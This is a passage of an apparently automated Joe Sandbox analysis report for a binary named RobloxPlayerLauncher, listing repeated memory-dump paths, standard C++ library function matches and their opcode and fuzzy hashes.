              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: ConditionMask$ErrorLast$FindInfoResourceVerifyVersion
              • String ID: (HRESULT 0x%8.8x)$HRESULT
              • API String ID: 3000659795-3673319160
              • Opcode ID: dffeeee4b1bde4d75f6ba6d21f4926d6e1311783a4b7ee03bb8cc8013af6daaa
              • Instruction ID: 6a81bbdce67576c61ad79dd5abb4bf7750d82ba237f2f54dbed465dcb40ceb66
              • Opcode Fuzzy Hash: dffeeee4b1bde4d75f6ba6d21f4926d6e1311783a4b7ee03bb8cc8013af6daaa
              • Instruction Fuzzy Hash: 4BC1C275A00205EBEB14DF68CC99B6EB7A5FF44314F104568FA069B3D2DBB9E910CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00795D40
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 47e66af861c44d40e93ea5e8ad9da29bfc63539944b91887bbcfa4fa0dde09c3
              • Instruction ID: 7a900bec88d3403697e24f908693a3dc6f67d4616453f130aacc2de8892613da
              • Opcode Fuzzy Hash: 47e66af861c44d40e93ea5e8ad9da29bfc63539944b91887bbcfa4fa0dde09c3
              • Instruction Fuzzy Hash: ABB1AFB4605A26DFCB12CF68D484BA9B7F1FF49314F288198E8159B352C739ED41CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00738795
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: f570b3af078527c206b165d9cc41c79072c574ef11185bbbc3e691a59211a7d8
              • Instruction ID: ffce869c99e7867dcf9fe5546381167f1b152fed3d42ab42561ba53158ccebbe
              • Opcode Fuzzy Hash: f570b3af078527c206b165d9cc41c79072c574ef11185bbbc3e691a59211a7d8
              • Instruction Fuzzy Hash: 89A1B170A00608DFDB20DF58C945BAABBF5FF44304F14896DE9559B382DB7AE900CB91
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: fa0602c935d7e2d71e6a2ed50c184baec28682398ac6a327613eb10c24543848
              • Instruction ID: 4cdea1633f3bbb53e3cbcf52fab26cd96958ab26174da5d6ea9ca2889dbea85f
              • Opcode Fuzzy Hash: fa0602c935d7e2d71e6a2ed50c184baec28682398ac6a327613eb10c24543848
              • Instruction Fuzzy Hash: C191AF75A05255CFCB11CF28C480A69BBF5BF89314F294298EA159B392C739EC42CFD1
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 0-1866435925
              • Opcode ID: 53b098ba8720980d1a32e9e5bf07abcf954176ae285888ff82763205046ffd2a
              • Instruction ID: c306b97eef2e1be06b189269a7e45cbf7f471e17878d97f2faa65e6531bc97c1
              • Opcode Fuzzy Hash: 53b098ba8720980d1a32e9e5bf07abcf954176ae285888ff82763205046ffd2a
              • Instruction Fuzzy Hash: E9815874A00205DFDB15CF98C584BAABBF5BF48304F2485ADE9469B752CB7AE901CF90
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 0088A4DD
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: e87cce4ea929716095108597ffa24e231f34788293354b26c54a564ae184492f
              • Instruction ID: 035189b7ee256f1a6bb4cd078ec6c991338adf0ae932b49d1ab2e8c1502540ae
              • Opcode Fuzzy Hash: e87cce4ea929716095108597ffa24e231f34788293354b26c54a564ae184492f
              • Instruction Fuzzy Hash: CE518C74A002149FEF18DF68D888A99B7F4FF48314F1580AAE905DB3A2D775ED81CB85
              APIs
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C37
                • Part of subcall function 00741C10: std::_Lockit::_Lockit.LIBCPMT ref: 00741C55
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741C75
                • Part of subcall function 00741C10: std::_Lockit::~_Lockit.LIBCPMT ref: 00741D44
              • std::ios_base::failure::failure.LIBCPMT ref: 0089502A
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: Lockitstd::_$Lockit::_Lockit::~_$std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 3570791469-1866435925
              • Opcode ID: 7995c7bd6128c00ef1ea1322c5632605b376cd116a79e9048c9381ef681d0e02
              • Instruction ID: 457de2512dcf4d656bb849ca299ab25636b184cd8209583f31b3e1e0e4648b2f
              • Opcode Fuzzy Hash: 7995c7bd6128c00ef1ea1322c5632605b376cd116a79e9048c9381ef681d0e02
              • Instruction Fuzzy Hash: 8D518E75A002159FCB14DFA8C949EA9B7F4FF48304F1980A9E905DB362DB71ED41CB90
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0073F256
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: c2050fb1277445f2354872391cd7e1e059bb6893bc5c6b908b085bdcfb116a8f
              • Instruction ID: 61f20ee96ea7dd4ddb59112fc123807a1743b2bedf82c664fdf1b658abdbff3b
              • Opcode Fuzzy Hash: c2050fb1277445f2354872391cd7e1e059bb6893bc5c6b908b085bdcfb116a8f
              • Instruction Fuzzy Hash: 6841EE75A00208DFEB24CF88D985FAAB7B5BF58344F1481A9E9059B352C739EE40CB80
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0073BC5B
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: f5dd9b71d4de7e07180f995f8225d4c258df0d00be646443c23d3c61210c328e
              • Instruction ID: a9157deb7a2c3cf0db5d8f56394ee685fbf0cac72a7f53b3de86400b84f54c56
              • Opcode Fuzzy Hash: f5dd9b71d4de7e07180f995f8225d4c258df0d00be646443c23d3c61210c328e
              • Instruction Fuzzy Hash: 3D31EE79A002089FDB20DF98D945FA9B3F4EF48304F144568EA56AB392CB79ED00CB91
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 00739FFE
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1995548578.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000003.00000002.1995524308.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996385497.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996426054.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996465052.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996603161.0000000000BFE000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996636677.0000000000C01000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996666726.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000C2B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001334000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1996706239.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000003.00000002.1997807909.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: std::ios_base::failure::failure
              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
              • API String ID: 2264918676-1866435925
              • Opcode ID: 8c6a59366df61e59207c3dccdad569e52af42c07df359ac104988227cdc39b24
              • Instruction ID: c221153b0dd01d0586c3244c976fa56eba7c161d06273b04fa07ba556d00170b
              • Opcode Fuzzy Hash: 8c6a59366df61e59207c3dccdad569e52af42c07df359ac104988227cdc39b24
              • Instruction Fuzzy Hash: 3A21E4759006089FD724CF58C946FA9B7E8EB08328F508669F622D7792D7B9ED008BD1
              APIs
              • std::ios_base::failure::failure.LIBCPMT ref: 0072834E
